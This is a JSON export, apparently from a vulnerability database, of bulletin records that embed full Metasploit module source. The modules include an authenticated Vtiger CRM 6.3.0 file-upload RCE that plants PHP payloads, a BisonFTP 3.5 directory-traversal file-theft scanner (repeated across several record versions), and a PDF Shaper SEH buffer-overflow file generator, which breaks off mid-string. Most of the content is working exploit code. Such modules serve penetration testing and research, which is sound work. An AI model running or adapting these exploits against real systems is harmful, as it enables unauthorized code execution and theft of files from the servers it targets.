["PACKETSTORM:148753", "PACKETSTORM:133755"]}, {"type": "dsquare", "idList": ["E-622"]}, {"type": "exploitdb", "idList": ["EDB-ID:38345", "EDB-ID:44379"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310808752"]}], "modified": "2019-07-22T20:47:44"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/vtiger_logo_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Vtiger CRM - Authenticated Logo Upload RCE',\n 'Description' => %q{\n Vtiger 6.3.0 CRM's administration interface allows for the upload of a company logo.\n Instead of uploading an image, an attacker may choose to upload a file containing PHP code and\n run this code by accessing the resulting PHP file.\n\n This module was tested against vTiger CRM v6.3.0.\n },\n 'Author' =>\n [\n 'Benjamin Daniel Mussler', # Discoverys\n 'Touhid M.Shaikh <touhidshaikh22@gmail.com>', # Metasploit Module\n 'SecureLayer7.net' # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2015-6000'],\n ['CVE','2016-1713'],\n ['EDB', '38345']\n ],\n 'DefaultOptions' =>\n {\n 'Encoder' => 'php/base64',\n 'RPORT' => 8888\n },\n 'Privileged' => false,\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n ['vTiger CRM v6.3.0', {}],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Sep 28 2015'))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, 'Base vTiger CRM directory path', '/']),\n OptString.new('USERNAME', [ true, 'Username to authenticate with', 'admin']),\n OptString.new('PASSWORD', [ true, 'Password to authenticate with', ''])\n ])\n\n register_advanced_options(\n [\n OptBool.new('PHPSHORTTAG', [true, 'Use short open php tags around payload', true])\n ])\n end\n\n def check\n res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'index.php') })\n\n unless res\n vprint_error(\"Unable to access the index.php file\")\n return CheckCode::Unknown\n end\n\n unless res.code == 200\n vprint_error(\"Error accessing the index.php file\")\n return CheckCode::Unknown\n end\n\n if res.body =~ /<small> Powered by vtiger CRM (.*.0)<\\/small>/i\n vprint_status(\"vTiger CRM version: #{$1}\")\n if $1 == '6.3.0'\n return CheckCode::Vulnerable\n else\n return CheckCode::Detected\n end\n end\n\n CheckCode::Safe\n end\n\n # Login Function.\n def login\n # Dummy Request for grabbing CSRF token and PHPSESSION ID\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'vhost' => \"#{rhost}\",\n })\n\n # Grabbing CSRF token from body\n /var csrfMagicToken = \"(?<csrf>sid:[a-z0-9,;:]+)\";/ =~ res.body\n fail_with(Failure::UnexpectedReply, \"#{peer} - Could not determine CSRF token\") if csrf.nil?\n vprint_good(\"CSRF Token for login: #{csrf}\")\n\n # Get Login now.\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'vars_get' => {\n 'module' => 'Users',\n 'action' => 'Login',\n },\n 'vars_post' => {\n '__vtrftk' => csrf,\n 'username' => datastore['USERNAME'],\n 'password' => datastore['PASSWORD']\n },\n })\n\n unless res\n fail_with(Failure::UnexpectedReply, \"#{peer} - Did not respond to Login request\")\n end\n\n cookie = nil\n if res.code == 302 && res.headers['Location'].include?(\"index.php?module=Users&parent=Settings&view=SystemSetup\")\n vprint_good(\"Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\n store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])\n cookie = res.get_cookies.split[-1]\n end\n\n unless cookie\n fail_with(Failure::UnexpectedReply, \"#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]\")\n end\n\n cookie\n end\n\n def exploit\n cookie = login\n unless cookie\n fail_with(Failure::UnexpectedReply, \"#{peer} - Authentication Failed\")\n end\n\n pay_name = rand_text_alpha(rand(5..10)) + \".php\"\n\n # Retrieve CSRF token\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'vhost' => \"#{rhost}\",\n 'cookie' => cookie\n })\n\n # Grabbing CSRF token from body\n /var csrfMagicToken = \"(?<csrf>sid:[a-z0-9,;:]+)\";/ =~ res.body\n fail_with(Failure::UnexpectedReply, \"#{peer} - Could not determine CSRF token\") if csrf.nil?\n vprint_good(\"CSRF Token for Form Upload: #{csrf}\")\n\n stager = datastore['PHPSHORTTAG'] ? '<? ' : '<?php '\n stager << payload.encoded\n stager << ' ?>'\n\n # Setting Company Form data\n post_data = Rex::MIME::Message.new\n post_data.add_part(csrf, nil, nil, \"form-data; name=\\\"__vtrftk\\\"\") # CSRF token\n post_data.add_part('Vtiger', nil, nil, \"form-data; name=\\\"module\\\"\")\n post_data.add_part('Settings', nil, nil, \"form-data; name=\\\"parent\\\"\")\n post_data.add_part('CompanyDetailsSave', nil, nil, \"form-data; name=\\\"action\\\"\")\n post_data.add_part(stager, \"image/jpeg\", nil, \"form-data; name=\\\"logo\\\"; filename=\\\"#{pay_name}\\\"\")\n post_data.add_part('vtiger', nil, nil, \"form-data; name=\\\"organizationname\\\"\")\n data = post_data.to_s\n\n print_status(\"Uploading payload: #{pay_name}\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'vhost' => \"#{rhost}\",\n 'cookie' => cookie,\n 'connection' => 'close',\n 'headers' => {\n 'Referer' => \"http://#{peer}/index.php?parent=Settings&module=Vtiger&view=CompanyDetails\",\n 'Upgrade-Insecure-Requests' => '1',\n },\n 'data' => data,\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\n })\n\n unless res && res.code == 302\n fail_with(Failure::None, \"#{peer} - File wasn't uploaded, aborting!\")\n end\n\n # Cleanup file\n register_files_for_cleanup(pay_name)\n\n vprint_status(\"Executing Payload: #{peer}/test/logo/#{pay_name}\" )\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, \"test\", \"logo\", pay_name)\n })\n\n if res && res.code != 200\n fail_with(Failure::UnexpectedReply, \"#{peer} - Payload not executed\")\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-22T20:47:44", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 70}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-07-22T22:56:46", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-07-22T22:56:46"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-07-22T22:56:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-22T22:56:46", "differentElements": ["sourceData"], "edition": 71}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "709d8b8cf7edef3c39160f6fad1d835e", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-07-31T20:54:49", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2019-07-31T20:54:49"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-07-31T20:54:49"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-31T20:54:49", "differentElements": ["sourceData"], "edition": 72}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-07-31T22:51:18", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-07-31T22:51:18"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-07-31T22:51:18"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-31T22:51:18", "differentElements": ["sourceData"], "edition": 73}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "709d8b8cf7edef3c39160f6fad1d835e", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-08-07T13:41:45", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2019-08-07T13:41:45"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-08-07T13:41:45"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-07T13:41:45", "differentElements": ["sourceData"], "edition": 74}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-08-07T15:51:10", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-08-07T15:51:10"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-08-07T15:51:10"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-07T15:51:10", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 75}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "5b127a73798ae08a29afbb5203e4504a", "type": "metasploit", "bulletinFamily": "exploit", "title": "PDF Shaper Buffer Overflow", "description": "PDF Shaper is prone to a security vulnerability when processing PDF files. The vulnerability appears when we use Convert PDF to Image and use a specially crafted PDF file. This module has been tested successfully on Win XP, Win 7, Win 8, Win 10.\n", "published": "2016-11-18T17:36:02", "modified": "2018-08-26T04:18:38", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-11T01:38:46", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 3.8, "vector": "NONE", "modified": "2019-08-11T01:38:46"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:8402841988995962344"]}, {"type": "threatpost", "idList": ["THREATPOST:D6C7F34C6376E7ECB543180954D154D1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:62182E90D88C9282869F40D834CA56BA"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142721", "OPENVAS:1361412562310142720", "OPENVAS:1361412562310142719", "OPENVAS:1361412562310815270", "OPENVAS:1361412562310815272", "OPENVAS:1361412562310891873", "OPENVAS:1361412562310113454", "OPENVAS:1361412562310815271", "OPENVAS:1361412562310112620", "OPENVAS:1361412562310891872"]}, {"type": "f5", "idList": ["F5:K15759349"]}, {"type": "cve", "idList": ["CVE-2018-20955"]}, {"type": "mssecure", "idList": ["MSSECURE:9A5D03B503C4E238EEFD4BF9E93C78A9"]}, {"type": "slackware", "idList": ["SSA-2019-220-01"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1873-1:7E39D"]}], "modified": "2019-08-11T01:38:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/shaper_pdf_bof.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::PDF\n include Msf::Exploit::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PDF Shaper Buffer Overflow',\n 'Description' => %q{\n PDF Shaper is prone to a security vulnerability when processing PDF files.\n The vulnerability appears when we use Convert PDF to Image and use a specially\n crafted PDF file. This module has been tested successfully on Win XP, Win 7,\n Win 8, Win 10.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'metacom27[at]gmail.com - twitter.com/m3tac0m', # POC\n 'metacom' # MSF Module\n ],\n 'References' =>\n [\n ['EDB', '37760']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process', # none/process/thread/seh\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'Space' => 2000,\n 'DisableNops' => true\n },\n 'Targets' =>\n [\n ['<Win Xp, Win 7, Win 8, Win 10 / PDF Shaper v.3.5 and v.3.6>',\n {\n 'Ret' => 0x00402AC1, # PDFTools.exe\n 'Offset' => 433\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Oct 03 2015',\n 'DefaultTarget' => 0\n ))\n\n register_options(\n [\n OptString.new('FILENAME', [false, 'The file name.', 'msf.pdf'])\n ], self.class\n )\n end\n\n def exploit\n file_create(make_pdf)\n end\n\n def jpeg\n buffer = \"\\xFF\\xD8\\xFF\\xEE\\x00\\x0E\\x41\\x64\\x6F\\x62\\x65\\x00\\x64\\x80\\x00\\x00\"\n buffer << \"\\x00\\x02\\xFF\\xDB\\x00\\x84\\x00\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\"\n buffer << \"\\x02\\x03\\x02\\x02\\x02\\x03\\x04\\x03\\x03\\x03\\x03\\x04\\x05\\x04\\x04\\x04\"\n buffer << \"\\x04\\x04\\x05\\x05\\x05\\x05\\x05\\x05\\x05\\x05\\x05\\x05\\x07\\x08\\x08\\x08\"\n buffer << \"\\x07\\x05\\x09\\x0A\\x0A\\x0A\\x0A\\x09\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\"\n buffer << \"\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\\x01\\x03\\x02\\x02\\x03\\x03\\x03\\x07\\x05\"\n buffer << \"\\x05\\x07\\x0D\\x0A\\x09\\x0A\\x0D\\x0F\\x0D\\x0D\\x0D\\x0D\\x0F\\x0F\\x0C\\x0C\"\n buffer << \"\\x0C\\x0C\\x0C\\x0F\\x0F\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\\x0F\\x0C\\x0E\\x0E\\x0E\"\n buffer << \"\\x0E\\x0E\\x0C\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\"\n buffer << \"\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\xFF\\xC0\\x00\\x14\\x08\\x00\\x32\\x00\"\n buffer << \"\\xE6\\x04\\x01\\x11\\x00\\x02\\x11\\x01\\x03\\x11\\x01\\x04\\x11\\x00\\xFF\\xC4\"\n buffer << \"\\x01\\xA2\\x00\\x00\\x00\\x07\\x01\\x01\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\"\n buffer << \"\\x00\\x00\\x00\\x04\\x05\\x03\\x02\\x06\\x01\\x00\\x07\\x08\\x09\\x0A\\x0B\\x01\"\n buffer << \"\\x54\\x02\\x02\\x03\\x01\\x01\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n buffer << \"\\x01\\x00\\x02\\x03\\x04\\x05\\x06\\x07\"\n buffer << rand_text(target['Offset']) # junk\n buffer << generate_seh_record(target.ret)\n buffer << payload.encoded\n buffer << rand_text(2388 - payload.encoded.length)\n buffer\n end\n\n def make_pdf\n @pdf << header\n add_object(1, \"<</Type/Catalog/Outlines 2 0 R /Pages 3 0 R>>\")\n add_object(2, \"<</Type/Outlines>>\")\n add_object(3, \"<</Type/Pages/Kids[5 0 R]/Count 1/Resources 